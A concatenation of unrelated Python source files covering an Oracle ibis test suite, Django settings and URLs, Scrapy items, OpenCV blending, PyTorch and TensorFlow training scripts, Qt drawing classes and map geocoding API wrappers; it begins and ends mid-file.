'in_octets': 1162614,
'in_ucast_pkts': 14178,
'out_bcast_pkts': 1,
'out_mcast_pkts': 65,
'out_octets': 12199396,
'out_ucast_pkts': 23366}}}
|
# Copyright 2020 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pandas as pd
import pytest
import ibis
import ibis.expr.types as ir
from third_party.ibis.ibis_oracle.api import compile
from ibis.tests.util import assert_equal
sa = pytest.importorskip('sqlalchemy')
pytest.importorskip('cx_Oracle')
pytestmark = pytest.mark.oracle
ORACLE_TEST_HOST = os.environ.get('IBIS_TEST_ORACLE_HOST', 'host')
ORACLE_TEST_PORT = os.environ.get('IBIS_TEST_ORACLE_PORT', 'port')
ORACLE_TEST_PROTOCOL = os.environ.get('IBIS_TEST_ORACLE_PROTOCOL', 'PROTOCOL')
ORACLE_TEST_DB = os.environ.get('IBIS_TEST_ORACLE_DATABASE', 'database')
IBIS_ORACLE_USER = os.environ.get('IBIS_TEST_ORACLE_USER', 'username')
IBIS_ORACLE_PASS = os.environ.get('IBIS_TEST_ORACLE_PASSWORD', 'password')
def test_table(alltypes):
assert isinstance(alltypes, ir.TableExpr)
def test_array_execute(alltypes):
d = alltypes.limit(10).double_col
s = d.execute()
assert isinstance(s, pd.Series)
assert len(s) == 5
def test_literal_execute(con):
expr = ibis.literal('1234')
result = con.execute(expr)
assert result == '1234'
def test_simple_aggregate_execute(alltypes):
d = alltypes.double_col.sum()
v = d.execute()
assert isinstance(v, float)
def test_list_tables(con):
assert len(con.list_tables()) > 0
assert len(con.list_tables(like='functional')) == 1
def test_compile_verify(alltypes):
unsupported_expr = alltypes.double_col.approx_median()
assert not unsupported_expr.verify()
supported_expr = alltypes.double_col.sum()
assert supported_expr.verify()
def test_database_layer(con, alltypes):
db = con.database()
t = db.functional_alltypes
assert_equal(t, alltypes)
assert db.list_tables() == con.list_tables()
db_schema = con.schema("admin")
assert db_schema.list_tables() == con.list_tables()
def test_compile_toplevel():
t = ibis.table([('foo', 'double')], name='t0')
expr = t.foo.sum()
result = third_party.ibis.ibis_oracle.api.compile(expr)
expected = "SELECT sum(t0.foo) AS sum \nFROM t0 AS t0" # noqa
assert str(result) == expected
def test_list_databases(con):
assert ORACLE_TEST_DB is not None
assert 'EUK1POD' in con.list_databases()
def test_list_schemas(con):
assert 'admin' in con.list_schemas()
assert 'adbsnmp' in con.list_schemas()
def test_metadata_is_per_table():
con = third_party.ibis.ibis_oracle.api.connect(
host=ORACLE_TEST_HOST,
port=ORACLE_TEST_PORT,
user=IBIS_ORACLE_USER,
password=IBIS_ORACLE_PASS,
database=ORACLE_TEST_DB,
protocol=ORACLE_TEST_PROTOCOL,
)
assert len(con.meta.tables) == 0
# assert that we reflect only when a table is requested
t = con.table('functional_alltypes') # noqa
assert 'functional_alltypes' in con.meta.tables
assert len(con.meta.tables) == 1
def test_schema_table():
con = third_party.ibis.ibis_oracle.api.connect(
host=ORACLE_TEST_HOST,
port=ORACLE_TEST_PORT,
user=IBIS_ORACLE_USER,
password=IBIS_ORACLE_PASS,
database=ORACLE_TEST_DB,
protocol=ORACLE_TEST_PROTOCOL,
)
# ensure that we can reflect the information schema (which is guaranteed
# to exist)
schema = con.schema('admin')
assert isinstance(schema['students'], ir.TableExpr)
|
from django.urls import path
from . import views
# from doobi.users.views import (
# user_detail_view,
# user_redirect_view,
# user_update_view,
# )
app_name = "users"
urlpatterns = [
# path("~redirect/", view=user_redirect_view, name="redirect"),
# path("~update/", view=user_update_view, name="update"),
# path("<str:username>/", view=user_detail_view, name="detail"),
path("", views.loggingin, name='loggingin'),
path("mypage/", views.mypage, name='mypage'),
path("get_recent_weight", views.get_recent_weight, name='get_recent_weight')
]
|
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/items.html
import scrapy
from scrapy.loader.processors import TakeFirst
def remove_star_text(input_string):
"""
Simple preprocess custom method
"""
if "star-rating" in input_string[0]:
return input_string[0].split(" ")[-1]
return input_string
class BookDataItemLoaderItem(scrapy.Item):
"""
When using ItemLoader we can define an output and input process per field.
Since ItemLoader returns lists by default, we can take the first element
of each list -- the data we want -- with the TakeFirst method.
We also did some processing with the remove_star_text method.
"""
item_number = scrapy.Field(
output_processor=TakeFirst())
title = scrapy.Field(
output_processor=TakeFirst())
price = scrapy.Field(
output_processor=TakeFirst())
stars = scrapy.Field(
input_processor=remove_star_text,
output_processor=TakeFirst())
thumbnail_path = scrapy.Field(
output_processor=TakeFirst())
detailed_book_url = scrapy.Field(
output_processor=TakeFirst())
image_url = scrapy.Field(
output_processor=TakeFirst())
product_description = scrapy.Field(
output_processor=TakeFirst())
|
import cv2
alpha = 0.5
beta = 1 - alpha
src1 = cv2.imread('./Media/sample.jpeg')
src2 = cv2.imread('./Media/sample2.jpeg')
# Check for image loading or not
if src1 is None:
print("Error loading Src1")
exit(-1)
elif src2 is None:
print("Error loading src2")
exit(-1)
# cretae addWeighted method
dst = cv2.addWeighted(src1, alpha, src2, beta, 0.0)
cv2.imshow('Mixed Image', dst)
k = cv2.waitKey(0) & 0xFF
if k == 27:
cv2.destroyAllWindows()
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import settings
from server.domain.models import *
from core_backend.database import con, connect
from sqlalchemy import create_engine
from core_backend.database.base import DomainBase
if __name__ == "__main__":
print settings.DB_URL
engine = create_engine(settings.DB_URL)
DomainBase.metadata.create_all(engine)
|
# Django settings for test_project project.
import os
import sys
DEBUG = True
TESTING = sys.argv[1:2] == ['test']
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(os.path.dirname(__file__), 'test_project.db'),
}
}
USE_I18N = True
USE_L10N = True
SECRET_KEY = 'lol I dont even care'
MIDDLEWARE = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.locale.LocaleMiddleware'
)
TEMPLATES = [{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': (os.path.join(os.path.realpath('.'), "templates"), ),
'APP_DIRS': True,
'OPTIONS': {
'context_processors': (
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.debug',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.request'
),
'debug': False
}
}]
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(os.path.join(os.path.realpath('.'), "..", "front", "static")),
]
ROOT_URLCONF = 'test_project.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'test_project.wsgi.application'
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.staticfiles',
'front',
)
SITE_ID = 1
# For testing purposes we allow everyone to have permission
if not TESTING:
# Don't use this permission in production unless you want everyone to have permissions
# event the anonoymous.
# this setting is for making more straigh forward the test_project usage.
DJANGO_FRONT_PERMISSION = lambda u: True
|
# Copyright © 2020, United States Government, as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All rights reserved.
#
# The DELTA (Deep Earth Learning, Tools, and Analysis) platform is
# licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Train a neural network.
"""
import sys
import time
import os
#import logging
#logging.getLogger("tensorflow").setLevel(logging.DEBUG)
import tensorflow as tf
from delta.config import config
from delta.config.extensions import custom_objects
from delta.imagery import imagery_dataset
from delta.ml.train import train
from delta.ml.config_parser import config_model
from delta.ml.io import save_model
#tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.DEBUG)
def main(options):
log_folder = config.train.log_folder()
if log_folder:
if not options.resume: # Start fresh and clear the read logs
os.system('rm -f ' + log_folder + '/*')
print('Dataset progress recording in: ' + log_folder)
else:
print('Resuming dataset progress recorded in: ' + log_folder)
images = config.dataset.images()
if not images:
print('No images specified.', file=sys.stderr)
return 1
img = images.load(0)
model = config_model(img.num_bands())
if options.resume is not None:
temp_model = tf.keras.models.load_model(options.resume, custom_objects=custom_objects())
else:
# this one is not built with proper scope, just used to get input and output shapes
temp_model = model()
start_time = time.time()
tile_size = config.io.tile_size()
tile_overlap = None
stride = config.train.spec().stride
# compute input and output sizes
if temp_model.input_shape[1] is None:
in_shape = None
out_shape = temp_model.compute_output_shape((0, tile_size[0], tile_size[1], temp_model.input_shape[3]))
out_shape = out_shape[1:3]
tile_overlap = (tile_size[0] - out_shape[0], tile_size[1] - out_shape[1])
else:
in_shape = temp_model.input_shape[1:3]
out_shape = temp_model.output_shape[1:3]
if options.autoencoder:
ids = imagery_dataset.AutoencoderDataset(images, in_shape, tile_shape=tile_size,
tile_overlap=tile_overlap, stride=stride)
else:
labels = config.dataset.labels()
if not labels:
print('No labels specified.', file=sys.stderr)
return 1
ids = imagery_dataset.ImageryDataset(images, labels, out_shape, in_shape,
tile_shape=tile_size, tile_overlap=tile_overlap,
stride=stride)
if log_folder is not None:
ids.set_resume_mode(options.resume, log_folder)
assert temp_model.input_shape[1] == temp_model.input_shape[2], 'Must have square chunks in model.'
assert temp_model.input_shape[3] == ids.num_bands(), 'Model takes wrong number of bands.'
tf.keras.backend.clear_session()
try:
model, _ = train(model, ids, config.train.spec(), options.resume)
if options.model is not None:
save_model(model, options.model)
except KeyboardInterrupt:
print('Training cancelled.')
stop_time = time.time()
print('Elapsed time = ', stop_time-start_time)
return 0
|
from qt import *
from qtcanvas import *
import math
def dxdy(w, x1, y1, x2, y2):
if x1 > x2:
x1, x2 = x2, x1
y1, y2 = y2, y1
a = x2-x1
b = y2-y1
c = math.sqrt(a*a + b*b)
if c == 0:
dx = dy = 0
else:
dx = b * w / c / 2.0
dy = a * w / c / 2.0
return dx,dy, x1,y1, x2,y2
class Axis(QCanvasPolygonalItem):
# there should be no gap between two consecutive types
HeadContinue = 0
HeadBranch = 1
HeadNegation = 2
def __init__(self, canvas):
QCanvasPolygonalItem.__init__(self, canvas)
self.pen = QPen(Qt.red)
self.setPen(self.pen)
self.points = (0,0,0,0)
self.area = QPointArray(4)
self.area.setPoint(0,0,0)
self.area.setPoint(1,1,0)
self.area.setPoint(2,1,1)
self.area.setPoint(3,0,1)
self.headType = self.HeadContinue
self.root = None
self.target = None
def areaPoints(self):
return self.area
def setPoints(self, x1,y1,x2,y2):
"""
The line has an orientation; (x1,y1) is the start point and
(x2,y2) is the end point.
"""
self.points = (x1,y1,x2,y2)
dx,dy, x1,y1, x2,y2 = dxdy(self.pen.width()+5.0, x1,y1,x2,y2)
self.area.setPoint(0, x1 + dx, y1 - dy)
self.area.setPoint(1, x1 - dx, y1 + dy)
self.area.setPoint(2, x2 - dx, y2 + dy)
self.area.setPoint(3, x2 + dx, y2 - dy)
def lineWidth(self):
return self.pen.width()
def _drawBranchHead(self, painter):
h = 5.0
x1, y1, x2, y2 = self.points
if x1 == x2:
x = x1 - h
if y2 > y1:
y = y1
else:
y = y1 - 2.0 * h
elif y1 == y2:
if x2 > x1:
x = x1
else:
x = x1 - 2.0 * h
y = y1 - h
else:
xx = float(x2 - x1)
yy = float(y2 - y1)
r = abs(yy / xx)
h1 = h / math.sqrt(2.0)
x = x1 + h * xx / abs(xx) / math.sqrt(1 + r*r) - h1
y = y1 + h * yy / abs(yy) / math.sqrt(1 + r*r) * r - h1
p = QPen(self.pen)
p.setWidth(1)
p.setStyle(Qt.SolidLine)
painter.setPen(p)
painter.setBrush(QBrush(p.color()))
painter.drawEllipse(x,y, 2*h, 2*h)
def _drawNegationHead(self, painter):
h = 5.0
x1, y1, x2, y2 = self.points
if x1 == x2:
new_x1 = x1 - h
new_x2 = x1 + h
if y1 > y2:
new_y1 = new_y2 = y1 - h
else:
new_y1 = new_y2 = y1 + h
elif y1 == y2:
if x1 > x2:
new_x1 = new_x2 = x1 - h
else:
new_x1 = new_x2 = x1 + h
new_y1 = y1 - h
new_y2 = y1 + h
else:
xx = x2 - x1
yy = y2 - y1
sigx = xx / abs(xx)
sigy = yy / abs(yy)
r = abs(yy / xx)
c = h / r
a = math.sqrt(c*c + h*h) / (1+r*r)
dx = sigx * a * r * r
dy = sigy * a * r
x11 = x1 + sigx * abs(dy)
y11 = y1 + sigy * abs(dx)
new_x1 = x11 + dx
new_y1 = y11 - dy
new_x2 = x11 - dx
new_y2 = y11 + dy
pen = QPen(self.pen)
pen.setWidth(2)
pen.setStyle(Qt.SolidLine)
painter.setPen(pen)
painter.drawLine(new_x1,new_y1,new_x2,new_y2)
def drawLineHead(self, painter):
if self.headType == self.HeadBranch:
self._drawBranchHead(painter)
elif self.headType == self.HeadNegation:
self._drawNegationHead(painter)
def drawShape(self, painter):
apply(painter.drawLine, self.points)
self.drawLineHead(painter)
def toggleHeadType(self):
self.headType = (self.headType + 1) % 3
self.update()
self.canvas().update()
def setHeadType(self, typ):
if typ not in (self.HeadContinue,
self.HeadBranch,
self.HeadNegation):
return
self.headType = typ
self.update()
self.canvas().update()
class AxisFollowing(Axis):
def __init__(self, canvas):
Axis.__init__(self, canvas)
self.pen.setWidth(3)
self.pen.setStyle(Qt.DashLine)
self.setPen(self.pen)
class AxisImmediateFollowing(Axis):
def __init__(self, canvas):
Axis.__init__(self, canvas)
self.pen.setWidth(3)
self.setPen(self.pen)
class AxisSibling(Axis):
def __init__(self, canvas):
Axis.__init__(self, canvas)
self.pen.setWidth(2)
self.pen.setStyle(Qt.DashLine)
self.setPen(self.pen)
self.distance = 2.0
def drawShape(self, painter):
x1,y1,x2,y2 = self.points
dx, dy, x1,y1, x2,y2 = dxdy(self.distance+self.pen.width(), x1,y1, x2,y2)
painter.drawLine(x1+dx,y1-dy,x2+dx,y2-dy)
painter.drawLine(x1-dx,y1+dy,x2-dx,y2+dy)
self.drawLineHead(painter)
def lineWidth(self):
return self.pen.width() * 2.0 + self.distance
class AxisImmediateSibling(Axis):
def __init__(self, canvas):
Axis.__init__(self, canvas)
self.pen.setWidth(2)
self.setPen(self.pen)
self.distance = 2.0
def drawShape(self, painter):
x1,y1,x2,y2 = self.points
dx, dy, x1,y1, x2,y2 = dxdy(self.distance+self.pen.width(), x1,y1, x2,y2)
painter.drawLine(x1+dx,y1-dy,x2+dx,y2-dy)
painter.drawLine(x1-dx,y1+dy,x2-dx,y2+dy)
self.drawLineHead(painter)
def lineWidth(self):
return self.pen.width() * 2.0 + self.distance
class AxisAncestor(Axis):
def __init__(self, canvas):
Axis.__init__(self, canvas)
self.pen.setWidth(3)
self.pen.setStyle(Qt.DashLine)
self.pen.setColor(Qt.blue)
self.setPen(self.pen)
class AxisParent(Axis):
def __init__(self, canvas):
Axis.__init__(self, canvas)
self.pen.setWidth(3)
self.pen.setColor(Qt.blue)
self.setPen(self.pen)
pen = QPen(Qt.red)
pen.setWidth(3)
pen.setStyle(Qt.DashLine)
penFollowing = pen
pen = QPen(Qt.red)
pen.setWidth(3)
penImmFollowing = pen
class AxisButton(QPushButton):
def __init__(self, pen, parent):
QPushButton.__init__(self, parent)
self.pen = pen
def drawLine(self, y):
p = QPainter(self)
p.setPen(self.pen)
x1 = 10
x2 = self.width() - 10
p.drawLine(x1, y, x2, y)
def paintEvent(self, e):
QPushButton.paintEvent(self, e)
self.drawLine(self.height() / 2.0)
class AxisButtonFollowing(AxisButton):
def __init__(self, parent, pen=penFollowing):
AxisButton.__init__(self, pen, parent)
class AxisButtonImmFollowing(AxisButtonFollowing):
def __init__(self, parent, pen=penImmFollowing):
AxisButtonFollowing.__init__(self, parent, pen)
class AxisButtonSibling(AxisButton):
def __init__(self, parent, pen=penFollowing):
AxisButton.__init__(self, pen, parent)
def paintEvent(self, e):
QPushButton.paintEvent(self, e)
y = self.height() / 2.0
dy = 1 + self.pen.width() / 2.0
y1 = y - dy
y2 = y + dy
self.drawLine(y1)
self.drawLine(y2)
class AxisButtonImmSibling(AxisButtonSibling):
def __init__(self, parent):
AxisButtonSibling.__init__(self, parent, penImmFollowing)
class AxisButtonParent(AxisButtonImmFollowing):
def __init__(self, parent):
AxisButtonImmFollowing.__init__(self, parent)
self.pen = QPen(self.pen)
self.pen.setColor(Qt.blue)
class AxisButtonAncestor(AxisButtonFollowing):
def __init__(self, parent):
AxisButtonFollowing.__init__(self, parent)
self.pen = QPen(self.pen)
self.pen.setColor(Qt.blue)
iconAxisFollowing = [
'22 1 1 1',
'r c #FF0000',
'rrrrrrrrrrrrrrrrrrrrrr',
]
textfileopen = [
'16 13 5 1',
'. c #040404',
'# c #333333',
'a c None',
'b c #ffffff',
'c c #ffffff',
'aaaaaaaaa...aaaa',
'aaaaaaaa.aaa.a.a',
'aaaaaaaaaaaaa..a',
'a...aaaaaaaa...a',
'.bcb.......aaaaa',
'.cbcbcbcbc.aaaaa',
'.bcbcbcbcb.aaaaa',
'.cbcb...........',
'.bcb.#########.a',
'.cb.#########.aa',
'.b.#########.aaa',
'..#########.aaaa',
'...........aaaaa'
]
|
import torch
import torch.nn as nn
import torch.optim as optim
import math
import cv2
import torchvision.transforms as transforms
from dataset.dataset import ImageFolder
from config import config
from models.model_resnet import ResNet, FaceQuality
from models.metrics import GaussianFace
from models.focal import FocalLoss
from util.utils import *
import torch.distributed as dist
import torch.multiprocessing as mp
from tensorboardX import SummaryWriter
from util.cosine_lr_scheduler import CosineDecayLR
from tqdm import tqdm
import os
import random
import numbers
import shutil
import argparse
import numpy as np
from ptflops import get_model_complexity_info
def load_state_dict(model, state_dict):
all_keys = {k for k in state_dict.keys()}
for k in all_keys:
if k.startswith('module.'):
state_dict[k[7:]] = state_dict.pop(k)
model_dict = model.state_dict()
pretrained_dict = {k:v for k, v in state_dict.items() if k in model_dict and v.size() == model_dict[k].size()}
if len(pretrained_dict) == len(model_dict):
print("all params loaded")
else:
not_loaded_keys = {k for k in pretrained_dict.keys() if k not in model_dict.keys()}
print("not loaded keys:", not_loaded_keys)
model_dict.update(pretrained_dict)
model.load_state_dict(model_dict)
def train():
DEVICE = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
writer = SummaryWriter(config.LOG_ROOT)
train_transform = transforms.Compose([
transforms.RandomApply([transforms.RandomResizedCrop(112, scale=(0.95, 1), ratio=(1, 1))]),
transforms.Resize(112),
transforms.RandomHorizontalFlip(),
transforms.RandomGrayscale(0.01),
transforms.ToTensor(),
transforms.Normalize(mean = config.RGB_MEAN, std = config.RGB_STD),
])
dataset_train = ImageFolder(config.TRAIN_FILES, train_transform)
train_loader = torch.utils.data.DataLoader(
dataset_train, batch_size = config.BATCH_SIZE, pin_memory = True, shuffle=True,
num_workers = 8, drop_last = True
)
NUM_CLASS = train_loader.dataset.classes
print("Number of Training Classes: {}".format(NUM_CLASS))
QUALITY = FaceQuality(512 * 7 * 7)
BACKBONE = ResNet(num_layers=100, feature_dim=512)
flops, params = get_model_complexity_info(BACKBONE, (3, 112, 112), as_strings=True, print_per_layer_stat=False)
print('BACKBONE FLOPs:', flops)
print('BACKBONE PARAMS:', params)
HEAD = GaussianFace(in_features = config.EMBEDDING_SIZE, out_features = NUM_CLASS)
LOSS = FocalLoss()
if config.BACKBONE_RESUME_ROOT and config.HEAD_RESUME_ROOT:
print("=" * 60)
if os.path.isfile(config.BACKBONE_RESUME_ROOT):
print("Loading Backbone Checkpoint '{}'".format(config.BACKBONE_RESUME_ROOT))
checkpoint = torch.load(config.BACKBONE_RESUME_ROOT)
load_state_dict(BACKBONE, checkpoint)
else:
print("No Checkpoint Found at '{}' Please Have a Check or Continue to Train from Scratch".format(config.BACKBONE_RESUME_ROOT))
if os.path.isfile(config.HEAD_RESUME_ROOT):
print("Loading Head Checkpoint '{}'".format(config.HEAD_RESUME_ROOT))
checkpoint = torch.load(config.HEAD_RESUME_ROOT)
load_state_dict(HEAD, checkpoint)
else:
print("No Checkpoint Found at '{}' Please Have a Check or Continue to Train from Scratch".format(config.HEAD_RESUME_ROOT))
print("=" * 60)
else:
print('Error: Pretrained backbone and head are necessary for quality training')
return
BACKBONE = nn.DataParallel(BACKBONE, device_ids = config.BACKBONE_GPUS)
BACKBONE = BACKBONE.cuda(config.BACKBONE_GPUS[0])
QUALITY = nn.DataParallel(QUALITY, device_ids = config.BACKBONE_GPUS)
QUALITY = QUALITY.cuda(config.BACKBONE_GPUS[0])
HEAD = nn.DataParallel(HEAD, device_ids = config.HEAD_GPUS, output_device=config.HEAD_GPUS[0])
HEAD = HEAD.cuda(config.HEAD_GPUS[0])
BACKBONE.eval()
OPTIMIZER = optim.SGD([{'params': QUALITY.parameters(), 'lr': config.QUALITY_LR}, {'params': HEAD.parameters(), 'lr': config.QUALITY_LR}], momentum=config.MOMENTUM)
DISP_FREQ = len(train_loader) // 100
NUM_EPOCH_WARM_UP = config.NUM_EPOCH_WARM_UP
NUM_BATCH_WARM_UP = len(train_loader) * NUM_EPOCH_WARM_UP
batch = 0
step = 0
scheduler = CosineDecayLR(OPTIMIZER, T_max=10*len(train_loader), lr_init = config.QUALITY_LR, lr_min = 1e-5, warmup = NUM_BATCH_WARM_UP)
for epoch in range(config.NUM_EPOCH):
HEAD.train()
QUALITY.train()
arcface_losses = AverageMeter()
confidences = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
scaler = torch.cuda.amp.GradScaler()
for inputs, labels in tqdm(iter(train_loader)):
inputs = inputs.cuda(config.BACKBONE_GPUS[0])
labels = labels.cuda(config.HEAD_GPUS[0])
with torch.no_grad():
features, fc = BACKBONE(inputs, True)
with torch.cuda.amp.autocast():
confidence = QUALITY(fc)
outputs = HEAD(confidence.cuda(config.HEAD_GPUS[0]), features.cuda(config.HEAD_GPUS[0]), labels, True)
arcface_loss = LOSS(outputs, labels)
# measure accuracy and record loss
prec1, prec5 = accuracy(outputs.data, labels, topk = (1, 5))
arcface_losses.update(arcface_loss.data.item(), inputs.size(0))
confidences.update(torch.mean(confidence).data.item(), inputs.size(0))
top1.update(prec1.data.item(), inputs.size(0))
top5.update(prec5.data.item(), inputs.size(0))
loss = arcface_loss
# compute gradient and do SGD step
OPTIMIZER.zero_grad()
#loss.backward()
#OPTIMIZER.step()
scaler.scale(loss).backward()
scaler.step(OPTIMIZER)
scaler.update()
if ((batch + 1) % DISP_FREQ == 0) and batch != 0:
print("=" * 60)
print('Epoch {}/{} Batch {}/{}\t'
'Training Loss {arcface_loss.val:.4f}({arcface_loss.avg:.4f})\t'
'Training Prec@1 {top1.val:.3f} ({top1.avg:.3f})\t'
'Training Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(
epoch + 1, config.NUM_EPOCH, batch + 1, len(train_loader) * config.NUM_EPOCH,
arcface_loss = arcface_losses, top1 = top1, top5 = top5))
print("=" * 60)
batch += 1 # batch index
scheduler.step(batch)
if batch % 1000 == 0:
print(OPTIMIZER)
# training statistics per epoch (buffer for visualization)
epoch_loss = arcface_losses.avg
epoch_acc = top1.avg
writer.add_scalar("Training_Loss", epoch_loss, epoch + 1)
writer.add_scalar("Training_Accuracy", epoch_acc, epoch + 1)
print("=" * 60)
print('Epoch: {}/{}\t'
'Training Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Training Prec@1 {top1.val:.3f} ({top1.avg:.3f})\t'
'Training Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(
epoch + 1, config.NUM_EPOCH, loss = arcface_losses, top1 = top1, top5 = top5))
print("=" * 60)
# save checkpoints per epoch
curTime = get_time()
if not os.path.exists(config.MODEL_ROOT):
os.makedirs(config.MODEL_ROOT)
torch.save(QUALITY.state_dict(), os.path.join(config.MODEL_ROOT, "Quality_Epoch_{}_Batch_{}_Time_{}_checkpoint.pth".format(epoch + 1, batch, curTime)))
torch.save(HEAD.state_dict(), os.path.join(config.MODEL_ROOT, "Head_Epoch_{}_Batch_{}_Time_{}_checkpoint.pth".format(epoch + 1, batch, curTime)))
if __name__ == "__main__":
train()
|
# import boto3
# s3 = boto3.client('s3')
# def handler(event, context):
# response = s3.get_object(
# Bucket='gtfs-bussim-347664766527',
# Key='config.sh',
# )
# print(str(response.get("Body").read()))
import pandas as pd
def handler(event, context):
print("hi")
df = pd.DataFrame([1, 2])
return "hi"
|
# Generated by Django 2.0.1 on 2018-01-21 08:57
from django.db import migrations, models
import django_jalali.db.models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Bar',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('date', django_jalali.db.models.jDateField()),
],
),
migrations.CreateModel(
name='BarTime',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('datetime', django_jalali.db.models.jDateTimeField()),
],
),
]
|
import os
import requests
import json
import time
from sachima.log import logger
from sachima import conf
from io import BytesIO
BAIDU_GEO_TOKEN = conf.get("BAIDU_GEO_TOKEN")
QQ_GEO_TOKEN = conf.get("QQ_GEO_TOKEN")
AMAP_GEO_TOKEN = conf.get("AMAP_GEO_TOKEN")
def poi_compound_dict(
dim={"K001": "subway", "K002": "hospital", "K003": "school"},
dis=[500, 1000],
lat=31.191869,
lng=121.446756,
onlycnt=False,
onlyfarest=True,
savetofile=False,
):
"""
DIM = {
"K001": "subway",
"K002": "hospital",
"K003": "school"
}
DIS = [500, 1000, 1500, 2000]
lat = 31.191869
lng = 121.446756
"""
res = {}
for k in dim:
for d in dis:
key = k + "_" + str(d) # eg. K001_1000
key_cnt = key + "_CNT" # eg. K001_1000_CNT
poi_json = poi(lat, lng, dim.get(k), radius=d)
if onlycnt is False:
if onlyfarest is False:
res[key] = str(poi_json)
elif d == max(dis):
res[key] = str(poi_json)
res[key_cnt] = poi_json.get("count")
return res
def poi(lat, lng, keywords, radius=1000):
"""
Get poi information from amap \n
https://lbs.amap.com/api/webservice/guide/api/search \n
"""
logger.info((lat, lng, keywords, radius))
if AMAP_GEO_TOKEN is None:
logger.info("error: Must config AMAP_GEO_TOKEN in sachima_config.py")
raise "Must config AMAP_GEO_TOKEN in sachima_config.py"
url = "https://restapi.amap.com/v3/place/around"
values = {
"key": AMAP_GEO_TOKEN,
"location": "{},{}".format(lng, lat),
"keywords": keywords,
"types": "",
"radius": radius, # default one mile
}
try:
r = requests.get(url, values).json()
logger.debug(r)
if r.get("info") == 'USER_DAILY_QUERY_OVER_LIMIT':
raise 'USER_DAILY_QUERY_OVER_LIMIT'
return r
except Exception as e:
raise e
def panorama(lat, lng):
"""
Panorama information query
return Image Buffer
you can open the buffer use PIL.Image.open(buffer)
"""
if BAIDU_GEO_TOKEN is None:
logger.info("error: Must config BAIDU_GEO_TOKEN in sachima_config.py")
raise "Must config BAIDU_GEO_TOKEN in sachima_config.py"
url = "http://api.map.baidu.com/panorama/v2"
values = {"ak": BAIDU_GEO_TOKEN, "fov": 180, "location": "{},{}".format(lng, lat)}
try:
logger.info("Fetching {},{} panorama picture ...".format(lat, lng))
r = requests.get(url, values).content
b = BytesIO()
b.write(r)
return b
except Exception as e:
raise e
def fetchBaiduLatLng(address):
"""
Use baidu map api to get the latitude and longitude of city from the Internet. \n
http://lbsyun.baidu.com/index.php?title=webapi \n
"""
if BAIDU_GEO_TOKEN is None:
logger.info("error: Must config BAIDU_GEO_TOKEN in sachima_config.py")
raise "Must config BAIDU_GEO_TOKEN in sachima_config.py"
values = {
"address": address,
"ret_coordtype": "",
"ak": BAIDU_GEO_TOKEN,
"sn": "",
"precise": 1,
"output": "json",
"callback": "",
}
url = "http://api.map.baidu.com/geocoder/v2/"
try:
r = requests.get(url, params=values).json()
logger.info(r)
if r.get("status") != 0:
return {}
else:
return {
"baidu_lat": r.get("result").get("location").get("lat"),
"baidu_lng": r.get("result").get("location").get("lng"),
"baidu_precise": r.get("result").get("precise"),
"baidu_confidence": r.get("result").get("confidence"),
"baidu_comprehension": r.get("result").get("comprehension"),
"baidu_level": r.get("result").get("level"),
"baidu_status": r.get("status"),
}
except Exception as e:
logger.info("fetchBaiduGeo for %s error: %s" % (address, e))
raise e
def fetchQQLatLng(address):
"""
Use qq map api to get latitude and longitude from the Internet.
https://lbs.qq.com/miniProgram/jsSdk/jsSdkGuide/methodGeocoder
"""
if QQ_GEO_TOKEN is None:
logger.info("error: Must config QQ_GEO_TOKEN in sachima_config.py")
raise "Must config QQ_GEO_TOKEN in sachima_config.py"
values = {"key": QQ_GEO_TOKEN, "output": "json", "address": address}
url = "https://apis.map.qq.com/ws/geocoder/v1/"
try:
r = requests.get(url, params=values).json()
if r.get("status") == 347:
return {}
else:
return {
"qq_lat": r.get("result").get("location").get("lat"),
"qq_lng": r.get("result").get("location").get("lng"),
"qq_title": r.get("result").get("title"),
"qq_adcode": r.get("result").get("ad_info").get("adcode"),
"qq_province": r.get("result")
.get("address_components")
.get("province"),
"qq_city": r.get("result").get("address_components").get("city"),
"qq_district": r.get("result")
.get("address_components")
.get("district"),
"qq_street": r.get("result").get("address_components").get("street"),
"qq_street_number": r.get("result")
.get("address_components")
